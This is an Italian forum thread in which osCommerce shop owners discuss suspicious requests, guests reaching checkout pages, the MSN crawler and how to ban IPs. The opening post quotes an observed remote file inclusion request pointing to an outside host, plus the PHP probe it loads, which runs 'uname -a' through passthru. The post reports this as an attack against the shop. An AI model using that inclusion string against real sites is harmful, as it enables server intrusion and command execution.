Sicurezza Oscommerce !!

Postate qui discussioni di carattere generale riguardo a problemi di installazione e configurazione di osCommerce

Moderatore: mod Generali

Mell
membro Junior
membro Junior
Messaggi: 30
Iscritto il: 11/01/2004, 1:00
Località: ITA
Contatta:

Sicurezza Oscommerce !!

Messaggio da Mell »

Ho notato che mi stanno inserendo dal browser delle stringhe tipo quelle per inserire dei comandi sql su phpnuke. La stessa stringa infatti è rilevata come tentativo d' intrusione in un portale phpnuke con sentinel (modulo per bloccare le intrusioni).
Le stringhe inserite sono queste:

Codice: Seleziona tutto

/catalog/products_new.php?page=http://66.89.120.35/ebekpko?
che da questo output:

Codice: Seleziona tutto

<?php echo "\nbl3"; echo "bl3 "; passthru("uname -a 2>&1"); ?>
Mi sembra che c'è un contributo per bannare gli ip, potrebbe bastare?
Aiuto Hozone!
Avatar utente
ioivi
membro Regular
membro Regular
Messaggi: 153
Iscritto il: 11/02/2004, 1:00
Località: Reggio Emilia
Contatta:

Messaggio da ioivi »

Io invece ho "guest" che accedono a pagine in teoria non accessibili ad un "guest"

Appena ne becco uno posto il link della pagina dove si trova .. mi è appena scappato ... quello che è interessante è l'ip ..

http://www.dnsstuff.com/tools/whois.ch?ip=65.54.188.74

Non credo molto al loro interesse per il mio store :wink:
Avatar utente
Domina
membro Regular
membro Regular
Messaggi: 101
Iscritto il: 18/06/2004, 0:00
Località: ITA
Contatta:

Messaggio da Domina »

scusatemi ma come fate a usare dnsstuf su oscommerce?lo piazzate in remoto o come lo fate funzionare?
Avatar utente
ioivi
membro Regular
membro Regular
Messaggi: 153
Iscritto il: 11/02/2004, 1:00
Località: Reggio Emilia
Contatta:

Messaggio da ioivi »

Domina ha scritto:scusatemi ma come fate a usare dnsstuf su oscommerce?lo piazzate in remoto o come lo fate funzionare?
Ho modificato il file whos_online.php.
Mi basta cliccare sul link in admin, si apre la pagina con il link che ho postato sopra
Avatar utente
Domina
membro Regular
membro Regular
Messaggi: 101
Iscritto il: 18/06/2004, 0:00
Località: ITA
Contatta:

Messaggio da Domina »

ohhhh hai modificato whos_online.php...
e ti chiedo molto se ci dici come si modifica? : ) :lol:
Avatar utente
ioivi
membro Regular
membro Regular
Messaggi: 153
Iscritto il: 11/02/2004, 1:00
Località: Reggio Emilia
Contatta:

Messaggio da ioivi »

Domina ha scritto:ohhhh hai modificato whos_online.php...
e ti chiedo molto se ci dici come si modifica? : ) :lol:
hehe .. io sono imbranato, non è tutta farina del mio sacco ...
Ho preso questa contribution:
http://www.oscommerce.com/community/con ... hos_online
La versione 1.2.5 per la precisione (ho visto ora che ci sono stati aggiornamenti)
Poi l'ho tradotta in italiano e modificato il codice per utilizzare dnsstuf
Il risultato?
Scarica la mia versione da qui
http://www.1accessori.it/contribution/w ... .5_ita.zip
Rinomina l'originale che trovi in catalog/admin e metti al suo posto questa versione.
Dimmi come la trovi :roll:
Avatar utente
ioivi
membro Regular
membro Regular
Messaggi: 153
Iscritto il: 11/02/2004, 1:00
Località: Reggio Emilia
Contatta:

Messaggio da ioivi »

ioivi ha scritto:Appena ne becco uno posto il link della pagina dove si trova ..
Beccato!

Si trova qui ora
/catalog/checkout_shipping.php?osCsid=acea598dcc5019a2d586079ecb

con questo ip
http://www.dnsstuff.com/tools/whois.ch?ip=65.54.188.74

Sto qui da guest ci arriva .. io no, mi devo loggare ... come mai??
Guardate qui:


Immagine
Avatar utente
ioivi
membro Regular
membro Regular
Messaggi: 153
Iscritto il: 11/02/2004, 1:00
Località: Reggio Emilia
Contatta:

rieccolo un un'altra pagina ...

Messaggio da ioivi »

rieccolo un un'altra pagina ...

Immagine
Nausicaa
membro Junior
membro Junior
Messaggi: 12
Iscritto il: 23/07/2004, 0:00
Località: USA

Messaggio da Nausicaa »

Quell'indirizzo insieme a molti altri appartengono all'MSN Bot, ovvero il motore di ricerca di microsoft, invasivo come pochi, che cerca di indicizzare tutto il mondo.... nel vero senso della parola...
Sul mio server sono arrivato a bannare tutti gli indirizzi al momento conosciuti... consuma banda come una sanguisuga, e altrettante risorse...
apre decine di connessioni contemporaneamente (e si permette addirittura di prendere e cercare di mandare messaggi privati sul forum dello stesso sito....).
Me lo ha fatto anche oggi, è stato più di un'ora a fare gli indici dell'oscommerce..... e poi mi chiedevo come mai andava lento il server....
comunque ora è in black list... fatelo anche voi se non volete che vi rompa le scatole.
johnnystecco
membro Junior
membro Junior
Messaggi: 17
Iscritto il: 29/01/2004, 1:00
Località: Italia
Contatta:

Messaggio da johnnystecco »

Ciao, anch'io ho lo stesso problema ed è quasi 24 ore che consuma banda. Come posso mettrelo nella black list?
Grazie
Nausicaa
membro Junior
membro Junior
Messaggi: 12
Iscritto il: 23/07/2004, 0:00
Località: USA

Messaggio da Nausicaa »

Io lo ho bannato direttamente nel firewall del server, a quanto ne so in oscommerce non c'è un sistema di ban degli ip.
Avatar utente
Domina
membro Regular
membro Regular
Messaggi: 101
Iscritto il: 18/06/2004, 0:00
Località: ITA
Contatta:

Messaggio da Domina »

vediamo effettivamente quanti shop hanno questo problema...
nn c'è una versione di osc da prendere in esempio ex poterla confrontare con la nostra?
Avatar utente
ioivi
membro Regular
membro Regular
Messaggi: 153
Iscritto il: 11/02/2004, 1:00
Località: Reggio Emilia
Contatta:

Messaggio da ioivi »

Nausicaa ha scritto:Quell'indirizzo insieme a molti altri appartengono all'MSN Bot, ovvero il motore di ricerca di microsoft, invasivo come pochi. ... cut ..
Alla faccia dell'invasivo .. scusa come fa a leggere quei file da "guest"?
Io ne faccio una questione di sicurezza
Se tu provi ad andare a leggere quelle pagine da guest oscommerce ti spedisce nella pagina login.php ... perchè loro arrivano fino a li?
Avatar utente
ioivi
membro Regular
membro Regular
Messaggi: 153
Iscritto il: 11/02/2004, 1:00
Località: Reggio Emilia
Contatta:

Messaggio da ioivi »

Nausicaa ha scritto:Io lo ho bannato direttamente nel firewall del server, a quanto ne so in oscommerce non c'è un sistema di ban degli ip.
Questo non potrebbe andare bene?
http://www.oscommerce.com/community/con ... rch,ban+ip
Nausicaa
membro Junior
membro Junior
Messaggi: 12
Iscritto il: 23/07/2004, 0:00
Località: USA

Messaggio da Nausicaa »

ioivi ha scritto:
Nausicaa ha scritto:Quell'indirizzo insieme a molti altri appartengono all'MSN Bot, ovvero il motore di ricerca di microsoft, invasivo come pochi. ... cut ..
Alla faccia dell'invasivo .. scusa come fa a leggere quei file da "guest"?
Io ne faccio una questione di sicurezza
Se tu provi ad andare a leggere quelle pagine da guest oscommerce ti spedisce nella pagina login.php ... perchè loro arrivano fino a li?
Non sò dirti perchè riesca ad arrivare sino a li, sò solo che anche con il forum lo trovo ogni tanto che cerca di spedire messaggi privati agli utenti...
magari hanno un archivio con tutti i file e cercano di forzare il sistema continuando ad insistere....
cosa che mi aspetto da microsoft
Rispondi